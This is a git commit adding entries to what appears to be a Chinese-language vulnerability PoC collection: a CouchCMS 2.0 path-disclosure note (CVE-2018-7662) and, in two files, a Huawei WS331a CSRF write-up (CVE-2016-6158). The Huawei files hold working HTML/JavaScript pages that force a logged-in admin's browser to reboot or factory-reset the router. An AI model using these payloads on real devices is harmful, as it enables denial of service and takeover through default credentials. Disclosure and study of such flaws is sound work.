This commit is contained in:
mr-xn 2019-07-24 12:22:41 +08:00
parent 4ce755629e
commit 1e35392d14
6 changed files with 78 additions and 0 deletions

View File

@ -0,0 +1,21 @@
### 漏洞简介
|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
--------|--------|---------|--------|-------|----|------|
|Couch through 2.0存在路径泄露漏洞|2018-03-04| zzw (zzw@5ecurity.cn)|[https://github.com/CouchCMS/CouchCMS/](https://github.com/CouchCMS/CouchCMS/) | [https://github.com/CouchCMS/CouchCMS/](https://github.com/CouchCMS/CouchCMS/) |2.0 | [CVE-2018-7662](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7662)|
#### 漏洞概述
> Couch through 2.0存在路径泄露漏洞当访问特定url时系统返回的报错信息中暴露物理路径信息。Couch through是一个在github上开源的系统漏洞发现者已经将漏洞信息通过[issues](https://github.com/CouchCMS/CouchCMS/issues/46)告知作者。
### POC实现代码如下
------
访问如下页面,报错信息中显示完整物理路径信息。
Location:
includes/mysql2i/mysql2i.func.php
addons/phpmailer/phpmailer.php

View File

@ -11,10 +11,12 @@
## IOT Device
- [天翼创维awifi路由器存在多处未授权访问漏洞](天翼创维awifi路由器存在多处未授权访问漏洞.md)
- [华为WS331a产品管理页面存在CSRF漏洞](华为WS331a产品管理页面存在CSRF漏洞.md)
## Web APP
- [致远OA_A8_getshell_0day](致远OA_A8_getshell_0day.md)
- [Couch through 2.0存在路径泄露漏洞](Couch through 2.0存在路径泄露漏洞.md)
## Mobile APP

BIN
img/2.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 12 KiB

BIN
img/3.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 12 KiB

27
template.md Normal file
View File

@ -0,0 +1,27 @@
### 漏洞简介
#### 漏洞概述
> 华为WS331a 是一款便携无线路由器。
> WS331a产品的管理页面中存在一个CSRF漏洞未经过认证的攻击者可以利用此漏洞发起CSRF攻击。成功利用此漏洞攻击者可以向受影响设备提交特定请求进而导致设备恢复出厂设置或者重启。 (漏洞编号:HWPSIRT-2016-07078)
> 此漏洞的CVE编号为CVE-2016-6158。
|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
--------|--------|---------|--------|-------|----|------|
|华为WS331a产品管理页面存在CSRF漏洞|2016-09-07|zixianme@zixian.org|[http://www.huawei.com/](http://www.huawei.com/) | [http://www.huawei.com/](http://www.huawei.com/) |WS331a-10 V100R001C02B017SP01及之前版本 | [CVE-2016-6158](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6158)|
### POC实现代码如下
> 当管理员登陆后打开如下poc页面WS331a设备将重启。
``` html
<form action="http://192.168.3.1/api/service/reboot.cgi" method="post">
</form>
<script> document.forms[0].submit(); </script>
```
> 当管理员登陆后打开如下poc页面WS331a设备将恢复初始化配置。设备自动重启后不需要密码即可连接热点并使用amdin/admin对设备进行管理控制。
```html
<form action="http://192.168.3.1/api/service/restoredefcfg.cgi" method="post">
</form>
<script> document.forms[0].submit(); </script>
```

View File

@ -0,0 +1,28 @@
### 漏洞简介
|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
--------|--------|---------|--------|-------|----|------|
|华为WS331a产品管理页面存在CSRF漏洞|2016-09-07|zixianme@zixian.org|[http://www.huawei.com/](http://www.huawei.com/) | [http://www.huawei.com/](http://www.huawei.com/) |WS331a-10 V100R001C02B017SP01及之前版本 | [CVE-2016-6158](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6158)|
#### 漏洞概述
> 华为WS331a 是一款便携无线路由器。
WS331a产品的管理页面中存在一个CSRF漏洞未经过认证的攻击者可以利用此漏洞发起CSRF攻击。成功利用此漏洞攻击者可以向受影响设备提交特定请求进而导致设备恢复出厂设置或者重启。 (漏洞编号:HWPSIRT-2016-07078)
此漏洞的CVE编号为CVE-2016-6158。
### POC实现代码如下
> 当管理员登陆后打开如下poc页面WS331a设备将重启。
``` html
<form action="http://192.168.3.1/api/service/reboot.cgi" method="post">
</form>
<script> document.forms[0].submit(); </script>
```
> 当管理员登陆后打开如下poc页面WS331a设备将恢复初始化配置。设备自动重启后不需要密码即可连接热点并使用amdin/admin对设备进行管理控制。
```html
<form action="http://192.168.3.1/api/service/restoredefcfg.cgi" method="post">
</form>
<script> document.forms[0].submit(); </script>
```